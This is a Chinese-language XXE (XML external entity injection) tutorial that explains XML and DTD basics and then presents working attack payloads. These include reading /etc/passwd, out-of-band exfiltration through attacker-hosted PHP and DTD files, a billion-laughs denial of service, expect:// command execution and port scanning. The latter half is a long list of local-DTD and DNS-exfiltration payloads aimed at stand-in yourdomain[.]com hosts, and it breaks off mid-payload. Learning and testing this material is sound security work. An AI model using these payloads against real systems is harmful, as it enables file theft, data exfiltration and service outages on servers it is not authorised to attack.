一文學懂XXE漏洞,從0到1

2021-02-16 Gamma實驗室

                 學習xxe漏洞到利用xxe漏洞

初識XML

一個好的代碼基礎能幫助你更好理解一類漏洞,所以先學習一下XML的基礎知識。

XML被設計為傳輸和存儲數據,其焦點是數據的內容,其把數據從HTML分離,是獨立於軟體和硬體的信息傳輸工具,簡單來說XML主要是面向傳輸的。

什麼是XML?

    XML 指可擴展標記語言(EXtensible Markup Language)

    XML 是一種標記語言,很類似 HTML

    XML 的設計宗旨是傳輸數據,而非顯示數據

    XML 標籤沒有被預定義。您需要自行定義標籤

    XML 被設計為具有自我描述性

    XML 是 W3C 的推薦標準

與HTML的對比

    XML 不是 HTML 的替代

    XML 和 HTML 為不同的目的而設計

    XML 被設計為傳輸和存儲數據,其焦點是數據的內容

    HTML 被設計用來顯示數據,其焦點是數據的外觀

    HTML 旨在顯示信息,而 XML 旨在傳輸信息

XML文檔結構

XML文檔結構包括XML聲明、DTD文檔類型定義(可選)、文檔元素。

 

請看示例:

<!--XML申明--><?xml version="1.0"?><!--文檔類型定義--><!DOCTYPE note [  <!--定義此文檔是 note 類型的文檔--><!ELEMENT note (to,from,heading,body)>  <!--定義note元素有四個元素--><!ELEMENT to (#PCDATA)>     <!--定義to元素為」#PCDATA」類型--><!ELEMENT from (#PCDATA)>   <!--定義from元素為」#PCDATA」類型--><!ELEMENT head (#PCDATA)>   <!--定義head元素為」#PCDATA」類型--><!ELEMENT body (#PCDATA)>   <!--定義body元素為」#PCDATA」類型-->]]]><!--文檔元素--><note><to>wecome</to><from>to</from><head>This wave is hacker</head><body>You are a good hacker</body></note>

DTD:

文檔類型定義(DTD)可定義合法的XML文檔構建模塊,它使用一系列合法的元素來定義文檔的結構。DTD 可被成行地聲明於XML文檔中(內部引用),也可作為一個外部引用。

    DTD文檔中有很多重要的關鍵字如下:

        o DOCTYPE(DTD的聲明)

        o ENTITY(實體的聲明)

        o SYSTEM、PUBLIC(外部資源申請)

可以用如下語法引入外部DTD

<!DOCTYPE 根元素 SYSTEM "文件名">

可以用如下語法引用內部DTD

實體:

實體可以理解為變量,其必須在DTD中定義申明,可以在文檔中的其他位置引用該變量的值。

實體按類型主要分為以下四種:

        o 內置實體 (Built-in entities)

        o 字符實體 (Character entities)

        o 通用實體 (General entities)

        o 參數實體 (Parameter entities)

當然,如果實體根據引用方式,還可分為內部實體與外部實體。

完整的實體類別可參考 DTD - Entities

 

四種實體引用實例

內部實體:

<!ENTITY 實體名稱 "實體的值"><!ENTITY 實體名稱 SYSTEM "URI">

參數實體:

<!ENTITY % 實體名稱 "實體的值"><!ENTITY % 實體名稱 "實體的值">

參數實體外實體+內部實體

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE a [    <!ENTITY name "nMask">]><foo>        <value>&name;</value></foo>

參數實體+外部實體

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE a [    <!ENTITY % name SYSTEM "file:///etc/passwd">    %name;]>

注意:%name(參數實體)是在DTD中被引用的,而&name(其餘實體)是在xml文檔中被引用的。

由於xxe漏洞主要是利用了DTD引用外部實體導致的漏洞,所以我們特別來分析外部實體

 

外部實體

定義

<!ENTITY 實體名稱 SYSTEM "URI">

通過url可以引用哪些類型的外部實體?當然不同的程序語言,所支持的協議是不一樣的

對照表:

案例演示:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE A [    <!ENTITY Config SYSTEM "file:///etc/passwd">]><foo>        <value>&Config;</value></foo>

XXE漏洞介紹:

XXE漏洞全稱XML External Entity Injection即xml外部實體注入漏洞,XXE漏洞發生在應用程式解析XML輸入時,沒有禁止外部實體的加載,導致可加載惡意外部文件,造成文件讀取、命令執行、內網埠掃描、攻擊內網網站、發起dos攻擊等危害。xxe漏洞觸發的點往往是可以上傳xml文件的位置,沒有對上傳的xml文件進行過濾,導致可上傳惡意xml文件。此類攻擊可能包括使用file:方案或系統標識符中的本地路徑公開本地文件,其中可能包含敏感數據,例如密碼或私人用戶數據。由於此類攻擊是相對於處理XML文檔的應用程式而發生的,因此攻擊者可能會使用此受信任的應用程式轉到其他內部系統,可能通過http(s)請求公開其他內部內容或啟動CSRF攻擊任何不受保護的內部服務。在某些情況下,可以通過取消引用惡意URI來利用容易受到客戶端內存損壞問題影響的XML處理器庫,從而可能允許在應用程式帳戶下執行任意代碼。其他攻擊可以訪問可能不會停止返回數據的本地資源,如果未釋放太多線程或進程,也可能會影響應用程式的可用性。

注意:

該應用程式無需顯式將響應返回給攻擊者,因為它很容易受到信息洩露的影響。攻擊者可以利用DNS信息通過子域名將數據洩漏到他們控制的DNS伺服器。

通過提交POST請求XML文件:

注意:

提交一個POST請求,請求頭加上Content-type:application/xml

 

1. 第一步,驗證XML解析器是否解析和執行我們自定義的XML內容

發送payload

<?xml version="1.0" encoding="UTF-8"?>  <!DOCTYPE ANY [  <!ENTITY name "hacker">]>    <root>&name;</root>

如果伺服器返回包成功解析了xml文檔

將返回內容為hacker

2. 第二步,是否支持外部實體的引用。

利用步驟:

1. 自建web網站

2. 在測試網站提交payload

<?xml version="1.0" encoding="utf-8"?>  <!DOCTYPE test [<!ENTITY dtgmlf6ent SYSTEM "http://自己網站ip/文件名">]>  <GeneralSearch>&test;</GeneralSearch>

3. 查看網站返回內容中是否帶有自建網站文件中的內容

4. 查看自建伺服器訪問日誌,是否有DTD文件等請求

 

1. 任意文件讀取:

Payload(有回顯)

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root>

這裡通過外帶(OOB)的方法來檢測(無回顯)

①自建web伺服器

②創建接受數據的文件readdata.php

<?php  file_put_contents("passwd.txt", $_GET['file']) ;  ?>

③創建hacker.php來供外部實體引用

<?php  $xml=<<<EOF  <?xml version="1.0"?>  <!DOCTYPE ANY[  <!ENTITY % file SYSTEM "file:///etc/passwd">  //被攻擊的伺服器<!ENTITY % remote SYSTEM "http://localhost/hacker.xml">  //自建伺服器%remote;%all;%send;  ]>  EOF;  $data = simplexml_load_string($xml) ;  echo "<pre>" ;  print_r($data) ;  ?>

④創建hacker.xml

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/readdata.php?file=%file;'>">

 、

當訪問http://localhost/hacker.php, 存在漏洞的伺服器會讀出/etc/passwd內容,發送給攻擊者伺服器上的hacker.php,然後把讀取的數據保存到本地的passwd.txt中。

2. DOS攻擊:

著名的「billion laughs」就是利用了XXE

通過遞歸調用

Payload

<?xml version="1.0"?>   <!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>

3. 命令執行

php安裝expect擴展可以直接執行系統命令,其他協議也有可能可以執行系統命令。

Payload

<?xml version=」1.0″ encoding=」utf-8″?><!DOCTYPE XXE<!ELEMENT name ANY ><!ENTITY XXE SYSTEM "expect://id" >]><root><name>&XXE;</name></root>

4. 埠掃描:

埠開放時會返回報錯信息,埠不存在時會無法連接

Payload:

<?xml version=」1.0″ encoding=」utf-8″?><!DOCTYPE XXE [<!ELEMENT name ANY ><!ENTITY XXE SYSTEM "http:/ip:port" >]><root><name>&XXE;</name</root>

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/><?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.yourdomain[.]com/"/><?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://xxe-xsi-nonamespaceschemalocation.yourdomain[.]com/"/><?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include schemaLocation="http://xxe-xsinclude-schemalocation.yourdomain[.]com/"/></xs:schema><?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include namespace="http://xxe-xsinclude-namespace.yourdomain[.]com/"/></xs:schema><?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import schemaLocation="http://xxe-xsimport-schemalocation.yourdomain[.]com/"/></xs:schema><?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import namespace="http://xxe-xsimport-namespace.yourdomain[.]com/"/></xs:schema><?xml-stylesheet href="http://xxe-xml-stylesheet.yourdomain[.]com/"?><x /><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-1.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-2.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-3.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-4.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-5.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-6.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-7.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-8.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-9.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-10.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-11.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-12.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-13.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-14.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-15.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-16.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-17.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-18.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-19.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-20.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-21.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-22.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-23.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-24.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-25.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY &#x25; file SYSTEM "http://exfil-xxe-payload-26.yourdomain[.]com"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY &#x25; file "dns-exfil-1"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY &#x25; file "dns-exfil-2"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-3"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-4"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY &#x25; file "dns-exfil-5"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-6"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY &#x25; file "dns-exfil-7"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY &#x25; file "dns-exfil-8"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY &#x25; file "dns-exfil-9"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY &#x25; file "dns-exfil-10"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;http://&#x25;file;.yourdomain[.]com/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd;]><message></message><?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY &#x25; file 